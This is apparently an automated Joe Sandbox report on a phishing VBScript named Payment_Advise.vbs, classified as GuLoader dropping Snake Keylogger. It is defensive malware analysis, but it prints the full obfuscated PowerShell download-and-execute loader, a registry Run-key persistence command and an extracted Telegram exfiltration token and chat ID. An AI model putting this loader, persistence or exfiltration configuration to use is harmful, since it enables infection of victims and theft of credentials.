Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment_Advise.vbs

Overview

General Information

Sample name:Payment_Advise.vbs
Analysis ID:1636428
MD5:757cb1563b0dde6b9e88debe2e6adf6e
SHA1:43a509423bad31e19480af5de0aeeaf81f3ee415
SHA256:68edcf224079bf7754901597e2314c00de3c09bce6894fe3a0cc68a1ed4a0720
Tags:GuLoadervbsuser-abuse_ch
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Snake Keylogger
Yara detected Telegram RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
Queues an APC in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes or reads registry keys via WMI
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7164 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_Advise.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • WmiPrvSE.exe (PID: 6272 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 6652 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Klunketid; function Pachyhematous214($Rearrangdrr){$Blodprocenten=4;do{$Holderes+=$Rearrangdrr[$Blodprocenten];$Blodprocenten+=5;$Contakia=Format-List} until(!$Rearrangdrr[$Blodprocenten])$Holderes}function Verdensbermthedernes242($Pseudophilanthropic168){ .($Chiropractic) ($Pseudophilanthropic168)}$Signe=Pachyhematous214 ' rorN erveSnagt Po .B,asw';$Signe+=Pachyhematous214 ' m,aeBj,kBColoCRestlAntiIInd eBefrN anT';$Beetle=Pachyhematous214 'UnstMf,rfo reuzAm.eiLamblUligl assaTaka/';$Netstrmforsyningens=Pachyhematous214 ' fbaTGennlWatesUnmi1,ate2';$Disvisor='Knor[ Invn .lde SupT Avo.Ham.S orkE Hypr IdeVafbii nyCNet.eStyrPVileOSm gI onrN anTC tam Ud aKrafN,malAWastgCleaE IfrRNedg]Gall:phal:CogiSRappePtercBumfuAntarH emI.aksTvideyLibePServRBricoRe kTDyngo,ospcAgorOmysiLCyno=Sasc$,fhenForeEPolyt RivsMitht Ek.rA coMVa,bfko tOUnderAnfasAn ry NicnR neISyntnTilsgS phesocin Lets';$Beetle+=Pachyhematous214 ',amu5Outf.Skam0 Kon Aadr(Opi WskediC,ounFagldUncoo inawOstrsAdri blaNIndlT.ofa Ut.1Ops.0Part.Unda0Jt e;Regi UnwhWshipiSkolnKvge6Expa4aart;R su Noex Bl 6C ro4Con ;Ma.n .unirStenvAkse: S d1 Bek3Lix 4Pr v. P.r0Stoo)svar AnsvGYngleBaglcMusckTrano Inf/Snub2Grov0Pro 1Cler0Cons0 Ibs1Time0Vam 1u th PriFF rsiHerbr Fo,e PlefDipooRappxReth/Beha1Aest3Maxi4genz.Foli0';$Troppes=Pachyhematous214 'KhaluBoufs,eciedrplRR gi-TrysaProlGSed,eRundNMisst';$Imperativ=Pachyhematous214 'Flugh Hv tC ret DehpRejfsBlyh:Bryd/Semi/Vegeh orioPr,vmd scaIndiy SeteLunk-sco sLeiba,aemlMlleaPagem.ogfaFlogtSand.ce tcUgeno U,dmk gl/ nprtSparoSystpPerq/,oniC Su.o esklP,ptl UbeeOutbgSaaliLullabespnN.utt Rr,.BorepTa efAmalb';$afkalkningsanlgget=Pachyhematous214 'Sche>';$Chiropractic=Pachyhematous214 'DistIGorbEAureX';$Neuronic='Afrydningen';$Afgrdevalg219='\Toldeftersyn.Man';Verdensbermthedernes242 (Pachyhematous214 ' Exo$ KaigSydsL AgeOB rdbavalaDemoLbala:.yaeGFac LNobeY idfnAgly= .ar$HydrE SeinF,agV fo :Coawa e tpAeonp lunDUdstAmanvts,lua lis+Indi$Chefa,equFPaamg CreR .dmDF reE ,ukvDolkASamfLKumagHvid2n ni1Hete9');Verdensbermthedernes242 (Pachyhematous214 'Sed $D.pogS.dbLmuddO U obDeliASkoslR.pi:Hj,mt RehOlebeF Ne OTingr RepeMono=Unim$GameiJingm R np lysELu,er Lina o.at aceiDyppV Non.H,ves SpopHalclRillIexogtCalc( lgo$u unAVrelf,reskGigmADundLHaemKE penEsquiLydsN I sgSycosMetaANoteNUngdl RasgbatiG IsiEPseuTHepa)');Verdensbermthedernes242 (Pachyhematous214 $Disvisor);$Imperativ=$Tofore[0];$Optllingens=(Pachyhematous214 'Cann$ HanGInfalFomeo ndbPatcAT lslBo i:GelaB,omieMonoTJagtA SublVareiT.winGratGOr asSoffE St vStumNTranEBi e=GalaNsocrEUrosWsjus-lslaO S obAntijPhy eCroscafslt T i S ftSSultYGue.S theTSecrepennm op .Ido.$Civis,ormIOverGVelsn Pare');Verdensbermthedernes242 ($Optllingens);Verdensbermthedernes242 (Pachyhematous214 ' G n$ReplBPer,e Last O eaGamel orsiOmphn ,olgOr lsvir eVal v DvbnIndseVejr.RankHR.tiev caa D,dd aaeSubarHvorsBlac[ B,s$MacrTNeurrSupeoProbpta epMor,eStrisProd]Ne n=K te$FunkBSpore ,lieFl.ctAfvnlprese');$elkesaite=Pachyhematous214 '.ack$Kn.pBDag eEnevtIngoaUn ulSquaiS ronC ttg,uresNo.oeForuvTambn.lite Pam.T.olD Ca o Praw uninstatl Unoo EftaEmbedSnouFBlaniKd.rlHormeGang(Tjen$ H,uIAnkemA.bep Us,e FosrA,taaFurntRi ai ,xyvVete, eb$ LuwAS,mlrAnagbsub e ExpjSubjdU desFr,sm orveScalt AdjoToivdGianeEc,orTurbn Sike Ud sTo p)';$Arbejdsmetodernes=$Glyn;Verdensbermthedernes242 (Pachyhematous214 'Flik$Pos,GCla L aruo decBHyalakat.LOver:Sy tmDkmaeDoorMdiapo Astr.emibUn eC tigRHegn=Over( Lovt.pauENsk S NonTCurm-F erp AmaaCirctNea.h tat Inte$I,sua Lb RMatebArveEOverJLed DEyepSsan mpa eEN ncTSto oPremd BegEIncuRScopnbrugeWinds Tro)');while (!$Memorbcr) {Verdensbermthedernes242 (Pachyhematous214 'Mid $TettgPejllEnmeoudg,bPr laPa al Uds: ChyE PrkfSpejtForaeLubrrstersDisttUmpir M sbSojaeimm.lKo.tsU,bue illr ClesFolk=Po,i$FermGStagiPrivg Chaa PunrSegntF ouiCorrnTy aa W,rlKaskeSouls') ;Verdensbermthedernes242 $elkesaite;Verdensbermthedernes242 (Pachyhematous214 'I,ra[ PibTIndsh FarRTeksEParaASursdB loiDisaN.uregReve.BasitRearhRundRSvedelimpaManidNabl]Spen:Pred:Bum.sUdl.LApp eCarpE.aggPU og(skry4Be,a0Elae0Baan0Squa)');Verdensbermthedernes242 (Pachyhematous214 'Fyns$Ka.egPiknLNonioBiflBBarfaSaddlUpro:R ndM Care FisMTherOskudRSkovB redc,dlaRMart=Arbe(omvet HybEstroSbrecTVol - SerpZym aOpkrt recHapis Feci$ColoAR adr reaB SlaeChurJErhvd MalSSkriMSorgeLayoTFlamOFladdVlgeeSujer Tw n BarEV rkSP nn)') ;Verdensbermthedernes242 (Pachyhematous214 'Over$SlangC aulsobiounviBTeguAMistL,nox: reAHemacTrolQSup UosteiAdverStu EBen,ROrth=Coeq$ExotGRy,eLCausORetsBToskaMuscLSokk: UndN I pySpeltReseTpi oiBjlkgP gwS TppT IceEScul+P.as+ ek% Paa$Feert paOTinsf TidOHageR StaeLivs. EpecDds oKi eU parn andt') ;$Imperativ=$Tofore[$Acquirer]}$Sercial=324094;$Skrottede=30955;Verdensbermthedernes242 (Pachyhematous214 'Kaby$SamagHurtLFe.sOSa mB.emiAWaylLMata:SysttHoveA DialskivT HalEB oeg Unhn tomSReta dri=hand tamGMakre StrT psp- CutCAsseOHarmN SkrT H beUnv.n S.atCisa Forh$Ryt Aco tr JenbIndseSe eJEccadTvinS SalMPaase MalTUndeOincedLam,eAdjer PhlnPrecEindes');Verdensbermthedernes242 (Pachyhematous214 'over$BevggPropl.ylio lurbPoneaUnralSide:PneuDPinheRgtolLadylSubosEquin V,ni.isinKappg .nce atinT.rnsFlor Sats=Fo,u Styk[Ch oSMe ayTa tsPeritIntreDagrmV.nt.S.ueCOrb oHomenSystv B,ye AntrTendt Iso] Un.:coca: T.lFpersr FlaoGonomskovB Auna Mi sPaa e Stu6K,nt4KmniSlaustUnr rAlfaiRec nTilrg er(Barn$Dev TArbeaO.oml CertSpire ntugShelnFolisElko)');Verdensbermthedernes242 (Pachyhematous214 'Amfi$Smi.GSpilLStanoNe eBRaitaFumlLCris:Un aAUns,N SkrtGenfITonic ygosUnde Arve=Maya Str[MultSThorYVampSAllhTNotoeHoveM Epi.SkartK aseBounxCompTPr,m.WorlES epnAktic figo EeldKorpi rboNUphogUnst]Pr b:Legi:For.AO ersPhytCM.tzI impiSlre.Sugag.inke ompTHells jacT mo RA.tii,edsnUndigForf(Siss$PrimdSkraEYikeLAngiL CyksAilan,ebaICantN BygGPjuseTaraNEoghS r,s)');Verdensbermthedernes242 (Pachyhematous214 'Vejn$VulggEntelIndloBlocbPi.oA SkvLJing:br nrAbouESvi.tRe inJudgI RunNso sG .ntsLumiLBuksI S anu lriKr,lESpa rGangSNond=.nse$Ta,gAA loNOverTKapiiUnmecVesisUldt.Gal S AndUKonsbS rasvi eTForsRPygmiLum,N fvGJemm( Spg$Likos Sc.eunderPonec utuiStreaIn rlEuca, Gar$ g nsC,rdKUnilR TiaOAmmotPoecTTinkEKursdOdinEDi.p)');Verdensbermthedernes242 $Retningsliniers;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 5352 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Klunketid; function Pachyhematous214($Rearrangdrr){$Blodprocenten=4;do{$Holderes+=$Rearrangdrr[$Blodprocenten];$Blodprocenten+=5;$Contakia=Format-List} until(!$Rearrangdrr[$Blodprocenten])$Holderes}function Verdensbermthedernes242($Pseudophilanthropic168){ .($Chiropractic) ($Pseudophilanthropic168)}$Signe=Pachyhematous214 ' rorN erveSnagt Po .B,asw';$Signe+=Pachyhematous214 ' m,aeBj,kBColoCRestlAntiIInd eBefrN anT';$Beetle=Pachyhematous214 'UnstMf,rfo reuzAm.eiLamblUligl assaTaka/';$Netstrmforsyningens=Pachyhematous214 ' fbaTGennlWatesUnmi1,ate2';$Disvisor='Knor[ Invn .lde SupT Avo.Ham.S orkE Hypr IdeVafbii nyCNet.eStyrPVileOSm gI onrN anTC tam Ud aKrafN,malAWastgCleaE IfrRNedg]Gall:phal:CogiSRappePtercBumfuAntarH emI.aksTvideyLibePServRBricoRe kTDyngo,ospcAgorOmysiLCyno=Sasc$,fhenForeEPolyt RivsMitht Ek.rA coMVa,bfko tOUnderAnfasAn ry NicnR neISyntnTilsgS phesocin Lets';$Beetle+=Pachyhematous214 ',amu5Outf.Skam0 Kon Aadr(Opi WskediC,ounFagldUncoo inawOstrsAdri blaNIndlT.ofa Ut.1Ops.0Part.Unda0Jt e;Regi UnwhWshipiSkolnKvge6Expa4aart;R su Noex Bl 6C ro4Con ;Ma.n .unirStenvAkse: S d1 Bek3Lix 4Pr v. P.r0Stoo)svar AnsvGYngleBaglcMusckTrano Inf/Snub2Grov0Pro 1Cler0Cons0 Ibs1Time0Vam 1u th PriFF rsiHerbr Fo,e PlefDipooRappxReth/Beha1Aest3Maxi4genz.Foli0';$Troppes=Pachyhematous214 'KhaluBoufs,eciedrplRR gi-TrysaProlGSed,eRundNMisst';$Imperativ=Pachyhematous214 'Flugh Hv tC ret DehpRejfsBlyh:Bryd/Semi/Vegeh orioPr,vmd scaIndiy SeteLunk-sco sLeiba,aemlMlleaPagem.ogfaFlogtSand.ce tcUgeno U,dmk gl/ nprtSparoSystpPerq/,oniC Su.o esklP,ptl UbeeOutbgSaaliLullabespnN.utt Rr,.BorepTa efAmalb';$afkalkningsanlgget=Pachyhematous214 'Sche>';$Chiropractic=Pachyhematous214 'DistIGorbEAureX';$Neuronic='Afrydningen';$Afgrdevalg219='\Toldeftersyn.Man';Verdensbermthedernes242 (Pachyhematous214 ' Exo$ KaigSydsL AgeOB rdbavalaDemoLbala:.yaeGFac LNobeY idfnAgly= .ar$HydrE SeinF,agV fo :Coawa e tpAeonp lunDUdstAmanvts,lua lis+Indi$Chefa,equFPaamg CreR .dmDF reE ,ukvDolkASamfLKumagHvid2n ni1Hete9');Verdensbermthedernes242 (Pachyhematous214 'Sed $D.pogS.dbLmuddO U obDeliASkoslR.pi:Hj,mt RehOlebeF Ne OTingr RepeMono=Unim$GameiJingm R np lysELu,er Lina o.at aceiDyppV Non.H,ves SpopHalclRillIexogtCalc( lgo$u unAVrelf,reskGigmADundLHaemKE penEsquiLydsN I sgSycosMetaANoteNUngdl RasgbatiG IsiEPseuTHepa)');Verdensbermthedernes242 (Pachyhematous214 $Disvisor);$Imperativ=$Tofore[0];$Optllingens=(Pachyhematous214 'Cann$ HanGInfalFomeo ndbPatcAT lslBo i:GelaB,omieMonoTJagtA SublVareiT.winGratGOr asSoffE St vStumNTranEBi e=GalaNsocrEUrosWsjus-lslaO S obAntijPhy eCroscafslt T i S ftSSultYGue.S theTSecrepennm op .Ido.$Civis,ormIOverGVelsn Pare');Verdensbermthedernes242 ($Optllingens);Verdensbermthedernes242 (Pachyhematous214 ' G n$ReplBPer,e Last O eaGamel orsiOmphn ,olgOr lsvir eVal v DvbnIndseVejr.RankHR.tiev caa D,dd aaeSubarHvorsBlac[ B,s$MacrTNeurrSupeoProbpta epMor,eStrisProd]Ne n=K te$FunkBSpore ,lieFl.ctAfvnlprese');$elkesaite=Pachyhematous214 '.ack$Kn.pBDag eEnevtIngoaUn ulSquaiS ronC ttg,uresNo.oeForuvTambn.lite Pam.T.olD Ca o Praw uninstatl Unoo EftaEmbedSnouFBlaniKd.rlHormeGang(Tjen$ H,uIAnkemA.bep Us,e FosrA,taaFurntRi ai ,xyvVete, eb$ LuwAS,mlrAnagbsub e ExpjSubjdU desFr,sm orveScalt AdjoToivdGianeEc,orTurbn Sike Ud sTo p)';$Arbejdsmetodernes=$Glyn;Verdensbermthedernes242 (Pachyhematous214 'Flik$Pos,GCla L aruo decBHyalakat.LOver:Sy tmDkmaeDoorMdiapo Astr.emibUn eC tigRHegn=Over( Lovt.pauENsk S NonTCurm-F erp AmaaCirctNea.h tat Inte$I,sua Lb RMatebArveEOverJLed DEyepSsan mpa eEN ncTSto oPremd BegEIncuRScopnbrugeWinds Tro)');while (!$Memorbcr) {Verdensbermthedernes242 (Pachyhematous214 'Mid $TettgPejllEnmeoudg,bPr laPa al Uds: ChyE PrkfSpejtForaeLubrrstersDisttUmpir M sbSojaeimm.lKo.tsU,bue illr ClesFolk=Po,i$FermGStagiPrivg Chaa PunrSegntF ouiCorrnTy aa W,rlKaskeSouls') ;Verdensbermthedernes242 $elkesaite;Verdensbermthedernes242 (Pachyhematous214 'I,ra[ PibTIndsh FarRTeksEParaASursdB loiDisaN.uregReve.BasitRearhRundRSvedelimpaManidNabl]Spen:Pred:Bum.sUdl.LApp eCarpE.aggPU og(skry4Be,a0Elae0Baan0Squa)');Verdensbermthedernes242 (Pachyhematous214 'Fyns$Ka.egPiknLNonioBiflBBarfaSaddlUpro:R ndM Care FisMTherOskudRSkovB redc,dlaRMart=Arbe(omvet HybEstroSbrecTVol - SerpZym aOpkrt recHapis Feci$ColoAR adr reaB SlaeChurJErhvd MalSSkriMSorgeLayoTFlamOFladdVlgeeSujer Tw n BarEV rkSP nn)') ;Verdensbermthedernes242 (Pachyhematous214 'Over$SlangC aulsobiounviBTeguAMistL,nox: reAHemacTrolQSup UosteiAdverStu EBen,ROrth=Coeq$ExotGRy,eLCausORetsBToskaMuscLSokk: UndN I pySpeltReseTpi oiBjlkgP gwS TppT IceEScul+P.as+ ek% Paa$Feert paOTinsf TidOHageR StaeLivs. EpecDds oKi eU parn andt') ;$Imperativ=$Tofore[$Acquirer]}$Sercial=324094;$Skrottede=30955;Verdensbermthedernes242 (Pachyhematous214 'Kaby$SamagHurtLFe.sOSa mB.emiAWaylLMata:SysttHoveA DialskivT HalEB oeg Unhn tomSReta dri=hand tamGMakre StrT psp- CutCAsseOHarmN SkrT H beUnv.n S.atCisa Forh$Ryt Aco tr JenbIndseSe eJEccadTvinS SalMPaase MalTUndeOincedLam,eAdjer PhlnPrecEindes');Verdensbermthedernes242 (Pachyhematous214 'over$BevggPropl.ylio lurbPoneaUnralSide:PneuDPinheRgtolLadylSubosEquin V,ni.isinKappg .nce atinT.rnsFlor Sats=Fo,u Styk[Ch oSMe ayTa tsPeritIntreDagrmV.nt.S.ueCOrb oHomenSystv B,ye AntrTendt Iso] Un.:coca: T.lFpersr FlaoGonomskovB Auna Mi sPaa e Stu6K,nt4KmniSlaustUnr rAlfaiRec nTilrg er(Barn$Dev TArbeaO.oml CertSpire ntugShelnFolisElko)');Verdensbermthedernes242 (Pachyhematous214 'Amfi$Smi.GSpilLStanoNe eBRaitaFumlLCris:Un aAUns,N SkrtGenfITonic ygosUnde Arve=Maya Str[MultSThorYVampSAllhTNotoeHoveM Epi.SkartK aseBounxCompTPr,m.WorlES epnAktic figo EeldKorpi rboNUphogUnst]Pr b:Legi:For.AO ersPhytCM.tzI impiSlre.Sugag.inke ompTHells jacT mo RA.tii,edsnUndigForf(Siss$PrimdSkraEYikeLAngiL CyksAilan,ebaICantN BygGPjuseTaraNEoghS r,s)');Verdensbermthedernes242 (Pachyhematous214 'Vejn$VulggEntelIndloBlocbPi.oA SkvLJing:br nrAbouESvi.tRe inJudgI RunNso sG .ntsLumiLBuksI S anu lriKr,lESpa rGangSNond=.nse$Ta,gAA loNOverTKapiiUnmecVesisUldt.Gal S AndUKonsbS rasvi eTForsRPygmiLum,N fvGJemm( Spg$Likos Sc.eunderPonec utuiStreaIn rlEuca, Gar$ g nsC,rdKUnilR TiaOAmmotPoecTTinkEKursdOdinEDi.p)');Verdensbermthedernes242 $Retningsliniers;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 1116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 6736 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • cmd.exe (PID: 5892 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Faderskabernes" /t REG_EXPAND_SZ /d "%Demiowl% -windowstyle 1 $Piddlingly=(gi 'HKCU:\Software\Underforstaaende\').GetValue('Udbetalingskortet');%Demiowl% ($Piddlingly)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 5988 cmdline: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Faderskabernes" /t REG_EXPAND_SZ /d "%Demiowl% -windowstyle 1 $Piddlingly=(gi 'HKCU:\Software\Underforstaaende\').GetValue('Udbetalingskortet');%Demiowl% ($Piddlingly)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • svchost.exe (PID: 6956 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Token": "7328026738:AAH1IHU2hS9jcv-fByxTl7eMvqtctOYjBF8", "Chat_id": "1503224244", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.1532628445.0000000008CC0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000005.00000002.1532737560.000000000E6CC000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000011.00000002.2189282837.0000000025ADB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000011.00000002.2189282837.00000000258F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          00000005.00000002.1510725943.0000000005E39000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            amsi64_6652.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_5352.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xc470:$b2: ::FromBase64String(
              • 0xb4ff:$s1: -join
              • 0x4cab:$s4: +=
              • 0x4d6d:$s4: +=
              • 0x8f94:$s4: +=
              • 0xb0b1:$s4: +=
              • 0xb39b:$s4: +=
              • 0xb4e1:$s4: +=
              • 0x1574f:$s4: +=
              • 0x157cf:$s4: +=
              • 0x15895:$s4: +=
              • 0x15915:$s4: +=
              • 0x15aeb:$s4: +=
              • 0x15b6f:$s4: +=
              • 0xbd0f:$e4: Get-WmiObject
              • 0xbefe:$e4: Get-Process
              • 0xbf56:$e4: Start-Process
              • 0x163f2:$e4: Get-Process

              System Summary

              barindex
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_Advise.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_Advise.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4040, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_Advise.vbs", ProcessId: 7164, ProcessName: wscript.exe
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Demiowl% -windowstyle 1 $Piddlingly=(gi 'HKCU:\Software\Underforstaaende\').GetValue('Udbetalingskortet');%Demiowl% ($Piddlingly), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 5988, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Faderskabernes
              Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Faderskabernes" /t REG_EXPAND_SZ /d "%Demiowl% -windowstyle 1 $Piddlingly=(gi 'HKCU:\Software\Underforstaaende\').GetValue('Udbetalingskortet');%Demiowl% ($Piddlingly)", CommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Faderskabernes" /t REG_EXPAND_SZ /d "%Demiowl% -windowstyle 1 $Piddlingly=(gi 'HKCU:\Software\Underforstaaende\').GetValue('Udbetalingskortet');%Demiowl% ($Piddlingly)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Faderskabernes" /t REG_EXPAND_SZ /d "%Demiowl% -windowstyle 1 $Piddlingly=(gi 'HKCU:\Software\Underforstaaende\').GetValue('Udbetalingskortet');%Demiowl% ($Piddlingly)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5892, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Faderskabernes" /t REG_EXPAND_SZ /d "%Demiowl% -windowstyle 1 $Piddlingly=(gi 'HKCU:\Software\Underforstaaende\').GetValue('Udbetalingskortet');%Demiowl% ($Piddlingly)", ProcessId: 5988, ProcessName: reg.exe
              Source: Network ConnectionAuthor: frack113: Data: DesusertionIp: 185.10.75.23, DesusertionIsIpv6: false, DesusertionPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 6736, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 51187
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Faderskabernes" /t REG_EXPAND_SZ /d "%Demiowl% -windowstyle 1 $Piddlingly=(gi 'HKCU:\Software\Underforstaaende\').GetValue('Udbetalingskortet');%Demiowl% ($Piddlingly)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Faderskabernes" /t REG_EXPAND_SZ /d "%Demiowl% -windowstyle 1 $Piddlingly=(gi 'HKCU:\Software\Underforstaaende\').GetValue('Udbetalingskortet');%Demiowl% ($Piddlingly)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 6736, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Faderskabernes" /t REG_EXPAND_SZ /d "%Demiowl% -windowstyle 1 $Piddlingly=(gi 'HKCU:\Software\Underforstaaende\').GetValue('Udbetalingskortet');%Demiowl% ($Piddlingly)", ProcessId: 5892, ProcessName: cmd.exe
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_Advise.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_Advise.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4040, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_Advise.vbs", ProcessId: 7164, ProcessName: wscript.exe
